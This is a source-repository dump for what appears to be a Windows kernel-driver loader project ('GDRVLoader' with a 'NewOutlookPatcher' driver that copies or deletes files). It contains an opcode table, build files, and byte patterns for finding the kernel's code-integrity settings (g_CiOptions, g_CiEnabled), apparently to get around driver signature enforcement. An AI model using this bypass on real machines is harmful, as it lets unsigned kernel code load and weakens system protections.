0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0, 42 | 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab, 43 | 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92, 44 | 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90, 45 | 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b, 46 | 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b, 47 | 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc, 48 | 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20, 49 | 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff, 50 | 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00, 51 | 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01, 52 | 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10, 53 | 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00, 54 | 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00, 55 | 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00, 56 | 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00, 57 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, 58 | 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00, 59 | 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40, 60 | 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43, 61 | 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40, 62 | 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40, 63 | 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06, 64 | 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07, 65 | 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 66 | 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10, 67 | 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00, 68 | 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb, 69 | 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff, 70 | 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09, 71 | 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff, 72 | 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08, 73 | 0x00,0xf0,0x02,0x00 74 | }; 75 | 76 | -------------------------------------------------------------------------------- /NOP.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 12.00 2 | # Visual Studio Version 17 3 | VisualStudioVersion = 17.7.34031.279 4 | MinimumVisualStudioVersion = 10.0.40219.1 5 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "worker", "NOP\worker\worker.vcxproj", "{8480DA70-45E9-4D91-A89C-24B27D0F4924}" 6 | EndProject 7 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "gui", "NOP\gui\gui.csproj", "{E109B8FE-CAD8-466A-9502-9AD85ED78B45}" 8 | ProjectSection(ProjectDependencies) = postProject 9 | {8480DA70-45E9-4D91-A89C-24B27D0F4924} = {8480DA70-45E9-4D91-A89C-24B27D0F4924} 10 | EndProjectSection 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|Any CPU = Debug|Any CPU 15 | Debug|ARM64 = Debug|ARM64 16 | Debug|x64 = Debug|x64 17 | Debug|x86 = Debug|x86 18 | Release|Any CPU = Release|Any CPU 19 | Release|ARM64 = Release|ARM64 20 | Release|x64 = Release|x64 21 | Release|x86 = Release|x86 22 | EndGlobalSection 23 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 24 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|Any CPU.ActiveCfg = Debug|x64 25 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|Any CPU.Build.0 = Debug|x64 26 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|ARM64.ActiveCfg = Debug|x64 27 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|ARM64.Build.0 = Debug|x64 28 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|x64.ActiveCfg = Debug|x64 29 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|x64.Build.0 = Debug|x64 30 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|x86.ActiveCfg = Debug|Win32 31 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|x86.Build.0 = Debug|Win32 32 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|Any CPU.ActiveCfg = Release|x64 33 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|Any CPU.Build.0 = Release|x64 34 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|ARM64.ActiveCfg = Release|x64 35 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|ARM64.Build.0 = Release|x64 36 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|x64.ActiveCfg = Release|x64 37 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|x64.Build.0 = Release|x64 38 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|x86.ActiveCfg = Release|Win32 39 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|x86.Build.0 = Release|Win32 40 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 41 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|Any CPU.Build.0 = Debug|Any CPU 42 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|ARM64.ActiveCfg = Debug|Any CPU 43 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|ARM64.Build.0 = Debug|Any CPU 44 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|x64.ActiveCfg = Debug|Any CPU 45 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|x64.Build.0 = Debug|Any CPU 46 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|x86.ActiveCfg = Debug|Any CPU 47 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|x86.Build.0 = Debug|Any CPU 48 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|Any CPU.ActiveCfg = Release|Any CPU 49 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|Any CPU.Build.0 = Release|Any CPU 50 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|ARM64.ActiveCfg = Release|Any CPU 51 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|ARM64.Build.0 = Release|Any CPU 52 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|x64.ActiveCfg = Debug|Any CPU 53 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|x64.Build.0 = Debug|Any CPU 54 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|x86.ActiveCfg = Release|Any CPU 55 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|x86.Build.0 = Release|Any CPU 56 | EndGlobalSection 57 | GlobalSection(SolutionProperties) = preSolution 58 | HideSolutionNode = FALSE 59 | EndGlobalSection 60 | GlobalSection(ExtensibilityGlobals) = postSolution 61 | SolutionGuid = {6CF0B89F-CA44-455A-9863-248A94FC4698} 62 | EndGlobalSection 63 | EndGlobal 64 | -------------------------------------------------------------------------------- /hde/table64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xfd 30 | #define DELTA_FPU_MODRM 0x104 31 | #define DELTA_PREFIXES 0x13c 32 | #define DELTA_OP_LOCK_OK 0x1ae 33 | #define DELTA_OP2_LOCK_OK 0x1c6 34 | #define DELTA_OP_ONLY_MEM 0x1d8 35 | #define DELTA_OP2_ONLY_MEM 0x1e7 36 | 37 | unsigned char hde64_table[] = { 38 | 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5, 39 | 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1, 40 | 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea, 41 | 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0, 42 | 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab, 43 | 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92, 44 | 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90, 45 | 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b, 46 | 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b, 47 | 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc, 48 | 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20, 49 | 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff, 50 | 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00, 51 | 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01, 52 | 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10, 53 | 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00, 54 | 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00, 55 | 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00, 56 | 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00, 57 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, 58 | 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00, 59 | 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40, 60 | 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43, 61 | 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40, 62 | 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40, 63 | 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06, 64 | 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07, 65 | 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 66 | 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10, 67 | 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00, 68 | 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb, 69 | 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff, 70 | 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09, 71 | 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff, 72 | 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08, 73 | 0x00,0xf0,0x02,0x00 74 | }; 75 | -------------------------------------------------------------------------------- /NOP/installer/Driver.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | volatile int i = 0; 4 | #define PATH_SRC L"\\DosDevices\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 5 | #define PATH_DST L"\\DosDevices\\BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" 6 | #define BUFSIZ 1024 7 | #define BUFTAG 'ilav' 8 | // echo load | GDRVLoader.exe DrvCopyFile.sys & echo unload | GDRVLoader.exe DrvCopyFile.sys 9 | 10 | NTSTATUS DriverUnload(_In_ PDRIVER_OBJECT driverObject) { 11 | UNREFERENCED_PARAMETER(driverObject); 12 | 13 | DbgPrint(("NewOutlookPatcher: DriverUnload\n")); 14 | return STATUS_SUCCESS; 15 | } 16 | 17 | NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT driverObject, _In_ PUNICODE_STRING registryPath) { 18 | UNREFERENCED_PARAMETER(registryPath); 19 | 20 | DbgPrint(("NewOutlookPatcher: DriverEntry\n")); 21 | driverObject->DriverUnload = DriverUnload; 22 | 23 | NTSTATUS rv = STATUS_SUCCESS; 24 | 25 | UNICODE_STRING szSrcName; 26 | RtlInitUnicodeString(&szSrcName, PATH_SRC); 27 | OBJECT_ATTRIBUTES oaSrcName; 28 | InitializeObjectAttributes(&oaSrcName, &szSrcName, OBJ_CASE_INSENSITIVE, NULL, NULL); 29 | UNICODE_STRING szDstName; 30 | RtlInitUnicodeString(&szDstName, PATH_DST); 31 | OBJECT_ATTRIBUTES oaDstName; 32 | InitializeObjectAttributes(&oaDstName, &szDstName, OBJ_CASE_INSENSITIVE, NULL, NULL); 33 | 34 | if (PATH_SRC[12 + i] == L'Z' && PATH_SRC[13 + i] == L'w' && PATH_SRC[14 + i] == L'D' && PATH_SRC[15 + i] == L'e' && PATH_SRC[16 + i] == L'l' && PATH_SRC[17 + i] == L'e' && PATH_SRC[18 + i] == L't' && PATH_SRC[19 + i] == L'e' && PATH_SRC[20 + i] == L'F' && PATH_SRC[21 + i] == L'i' && PATH_SRC[22 + i] == L'l' && PATH_SRC[23 + i] == L'e' && PATH_SRC[24 + i] == L'\0') { 35 | 36 | rv = ZwDeleteFile(&oaDstName); 37 | DbgPrint("NewOutlookPatcher: ZwDeleteFile Src: %S (%d)\n", PATH_DST, rv); 38 | } 39 | else { 40 | 41 | HANDLE hSrc; 42 | IO_STATUS_BLOCK iosbSrcCreate; 43 | rv = ZwCreateFile(&hSrc, GENERIC_READ, &oaSrcName, &iosbSrcCreate, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 44 | DbgPrint("NewOutlookPatcher: ZwCreateFile Src: %S (%d)\n", PATH_SRC, rv); 45 | if (NT_SUCCESS(rv)) { 46 | 47 | HANDLE hDst; 48 | IO_STATUS_BLOCK iosbDstCreate; 49 | rv = ZwCreateFile(&hDst, GENERIC_WRITE, &oaDstName, &iosbDstCreate, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 50 | DbgPrint("NewOutlookPatcher: ZwCreateFile Dst: %S (%d)\n", PATH_DST, rv); 51 | if (NT_SUCCESS(rv)) { 52 | 53 | PVOID buffer = ExAllocatePool2(POOL_FLAG_PAGED, BUFSIZ, BUFTAG); 54 | DbgPrint("NewOutlookPatcher: ExAllocatePool2: %p\n", buffer); 55 | if (buffer) { 56 | 57 | LARGE_INTEGER liReadPos, liWritePos; 58 | liReadPos.QuadPart = 0; 59 | liWritePos.QuadPart = 0; 60 | 61 | while (NT_SUCCESS(rv)) { 62 | IO_STATUS_BLOCK iosbSrcRead; 63 | rv = ZwReadFile(hSrc, NULL, NULL, NULL, &iosbSrcRead, buffer, BUFSIZ, &liReadPos, NULL); 64 | //DbgPrint(("ZwReadFile Src: %x\n", rv)); 65 | if (NT_SUCCESS(rv)) { 66 | 67 | liReadPos.QuadPart += iosbSrcRead.Information; 68 | IO_STATUS_BLOCK iosbSrcWrite; 69 | rv = ZwWriteFile(hDst, NULL, NULL, NULL, &iosbSrcWrite, buffer, (ULONG)iosbSrcRead.Information, &liWritePos, NULL); 70 | //DbgPrint(("ZwWriteFile Dst: %x\n", rv)); 71 | if (NT_SUCCESS(rv)) { 72 | 73 | liWritePos.QuadPart += iosbSrcWrite.Information; 74 | } 75 | } 76 | } 77 | 78 | ExFreePoolWithTag(buffer, BUFTAG); 79 | } 80 | 81 | ZwClose(hDst); 82 | } 83 | ZwClose(hSrc); 84 | } 85 | } 86 | 87 | return STATUS_SUCCESS; 88 | } 89 | -------------------------------------------------------------------------------- /GDRVLoader.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Release 6 | x64 7 | 8 | 9 | 10 | 16.0 11 | {C2F662DB-3ED6-47EE-A331-2EBE11AA36C3} 12 | Win32Proj 13 | Swind2 14 | 10.0 15 | loader 16 | 17 | 18 | 19 | Application 20 | false 21 | true 22 | Unicode 23 | v143 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | false 36 | $(SolutionDir)$(Platform)\Release\ 37 | $(Platform)\$(ConfigurationName)\ 38 | true 39 | 40 | 41 | true 42 | $(TargetName.Replace(' ','')) 43 | 44 | 45 | 46 | Level3 47 | NotUsing 48 | MaxSpeed 49 | true 50 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 51 | ProgramDatabase 52 | Column 53 | 54 | 55 | MultiThreaded 56 | 57 | 58 | stdcpp20 59 | 60 | 61 | true 62 | 63 | 64 | Sync 65 | Default 66 | true 67 | Neither 68 | 69 | 70 | 71 | 72 | true 73 | true 74 | 75 | 76 | Windows 77 | true 78 | true 79 | true 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | /NOVCFEATURE /NOCOFFGRPINFO %(AdditionalOptions) 89 | ntdll.lib;kernel32.lib;shlwapi.lib 90 | 91 | 92 | false 93 | false 94 | RequireAdministrator 95 | 96 | 97 | true 98 | 99 | 100 | true 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | -------------------------------------------------------------------------------- /NOP/installer/installer.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | Debug 14 | ARM64 15 | 16 | 17 | Release 18 | ARM64 19 | 20 | 21 | 22 | {592D31AB-A734-4DEE-B85F-57BB67759963} 23 | {1bc93793-694f-48fe-9372-81e2b05556fd} 24 | v4.5 25 | 12.0 26 | Debug 27 | x64 28 | installer 29 | 30 | 31 | 32 | Windows10 33 | true 34 | WindowsKernelModeDriver10.0 35 | Driver 36 | KMDF 37 | Universal 38 | 39 | 40 | Windows10 41 | false 42 | WindowsKernelModeDriver10.0 43 | Driver 44 | KMDF 45 | Universal 46 | 47 | 48 | Windows10 49 | true 50 | WindowsKernelModeDriver10.0 51 | Driver 52 | KMDF 53 | Universal 54 | 55 | 56 | Windows10 57 | false 58 | WindowsKernelModeDriver10.0 59 | Driver 60 | KMDF 61 | Universal 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | DbgengKernelDebugger 73 | true 74 | 75 | 76 | DbgengKernelDebugger 77 | true 78 | 79 | 80 | DbgengKernelDebugger 81 | 82 | 83 | DbgengKernelDebugger 84 | 85 | 86 | 87 | sha256 88 | 89 | 90 | 91 | 92 | sha256 93 | 94 | 95 | 96 | 97 | sha256 98 | 99 | 100 | 101 | 102 | sha256 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | -------------------------------------------------------------------------------- /global.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | 4 | #include "utils/ntdll.h" 5 | #include 6 | #include 7 | 8 | const BYTE Pattern_CipInit_1709[17] = "\x4c\x8b\xcb\x4c\x8b\xc7\x48\x8b\xd6\x8b\xcd\xe8\x00\x00\x00\x00"; 9 | const BYTE Pattern_CipInit[13] = "\x41\x8b\xca\x48\x83\xc4\x28\xe9\x00\x00\x00\x00"; 10 | const BYTE Pattern_gCiOptions[10] = "\x49\x8b\xe9\x89\x0d\x00\x00\x00\x00"; 11 | const BYTE Pattern_gCiEnabled[5] = "\xeb\x06\x88\x1d"; 12 | 13 | 14 | #ifdef __cplusplus 15 | extern "C" { 16 | #endif 17 | 18 | #define PAGE_SIZE 0x1000 19 | 20 | #if defined(__cplusplus) && \ 21 | ((defined(_MSC_VER) && (_MSC_VER >= 1900)) || defined(__clang__)) 22 | #define CONSTEXPR constexpr 23 | #else 24 | #define CONSTEXPR 25 | #endif 26 | 27 | #if defined(__clang__) 28 | #undef FIELD_OFFSET 29 | #undef UFIELD_OFFSET 30 | #define FIELD_OFFSET(type, field) ((LONG)__builtin_offsetof(type, field)) 31 | #define UFIELD_OFFSET(type, field) ((ULONG)__builtin_offsetof(type, field))notion 32 | #endif 33 | 34 | // swind2.cpp 35 | NTSTATUS 36 | WindLoadDriver( 37 | _In_ PWCHAR LoaderName, 38 | _In_ PWCHAR DriverName, 39 | _In_ BOOLEAN Hidden 40 | ); 41 | 42 | NTSTATUS 43 | WindUnloadDriver( 44 | _In_ PWCHAR DriverName, 45 | _In_ BOOLEAN Hidden 46 | ); 47 | 48 | // sysinfo.cpp 49 | NTSTATUS 50 | PrintSystemInformation( 51 | ); 52 | 53 | // pe.cpp 54 | NTSTATUS 55 | MapFileSectionView( 56 | _In_ PCWCHAR Filename, 57 | _In_ BOOLEAN ForceDisableAslr, 58 | _Out_ PVOID *ImageBase, 59 | _Out_ PSIZE_T ViewSize 60 | ); 61 | 62 | PVOID 63 | GetProcedureAddress( 64 | _In_ ULONG_PTR DllBase, 65 | _In_ PCSTR RoutineName 66 | ); 67 | 68 | FORCEINLINE 69 | ULONG 70 | RtlNtMajorVersion( 71 | ) 72 | { 73 | return *reinterpret_cast(0x7FFE0000 + 0x026C); 74 | } 75 | 76 | FORCEINLINE 77 | ULONG 78 | RtlNtMinorVersion( 79 | ) 80 | { 81 | return *reinterpret_cast(0x7FFE0000 + 0x0270); 82 | } 83 | 84 | CONSTEXPR 85 | FORCEINLINE 86 | LONGLONG 87 | RtlMsToTicks( 88 | _In_ ULONG Milliseconds 89 | ) 90 | { 91 | return 10000LL * static_cast(Milliseconds); 92 | } 93 | 94 | FORCEINLINE 95 | VOID 96 | RtlSleep( 97 | _In_ ULONG Milliseconds 98 | ) 99 | { 100 | LARGE_INTEGER Timeout; 101 | Timeout.QuadPart = -1 * RtlMsToTicks(Milliseconds); 102 | NtDelayExecution(FALSE, &Timeout); 103 | } 104 | 105 | CONSTEXPR 106 | FORCEINLINE 107 | BOOLEAN 108 | IsWin64( 109 | ) 110 | { 111 | #if defined(_WIN64) || defined(_M_AMD64) 112 | return TRUE; 113 | #else 114 | return FALSE; 115 | #endif 116 | } 117 | 118 | inline 119 | VOID 120 | WaitForKey( 121 | ) 122 | { 123 | HANDLE StdIn = NtCurrentPeb()->ProcessParameters->StandardInput; 124 | INPUT_RECORD InputRecord = { 0 }; 125 | ULONG NumRead; 126 | while (InputRecord.EventType != KEY_EVENT || !InputRecord.Event.KeyEvent.bKeyDown || InputRecord.Event.KeyEvent.dwControlKeyState != 127 | (InputRecord.Event.KeyEvent.dwControlKeyState & ~(RIGHT_CTRL_PRESSED | LEFT_CTRL_PRESSED))) 128 | { 129 | ReadConsoleInputW(StdIn, &InputRecord, 1, &NumRead); 130 | } 131 | } 132 | 133 | #ifdef NT_ANALYSIS_ASSUME 134 | // wdm.h's asserts are incompatible with both clang and MS's own analyzer 135 | #undef NT_ANALYSIS_ASSUME 136 | #undef NT_ASSERT_ACTION 137 | #undef NT_ASSERTMSG_ACTION 138 | #undef NT_ASSERTMSGW_ACTION 139 | #undef NT_ASSERT_ASSUME 140 | #undef NT_ASSERTMSG_ASSUME 141 | #undef NT_ASSERTMSGW_ASSUME 142 | #undef NT_ASSERT 143 | #undef NT_ASSERTMSG 144 | #undef NT_ASSERTMSGW 145 | #endif 146 | 147 | #ifdef _PREFAST_ 148 | #define NT_ANALYSIS_ASSUME(...) _Analysis_assume_(__VA_ARGS__) 149 | #elif defined(_DEBUG) || defined(DBG) 150 | #define NT_ANALYSIS_ASSUME(...) ((void) 0) 151 | #else 152 | #define NT_ANALYSIS_ASSUME(...) __noop(__VA_ARGS__) 153 | #endif 154 | 155 | #if !defined(__clang__) 156 | #if !defined(DbgRaiseAssertionFailure) 157 | #define DbgRaiseAssertionFailure() __int2c() 158 | #endif 159 | 160 | #define NT_ASSERT_ACTION(_exp) \ 161 | ((!(_exp)) ? \ 162 | (__annotation((PWCHAR)L"Debug", L"AssertFail", 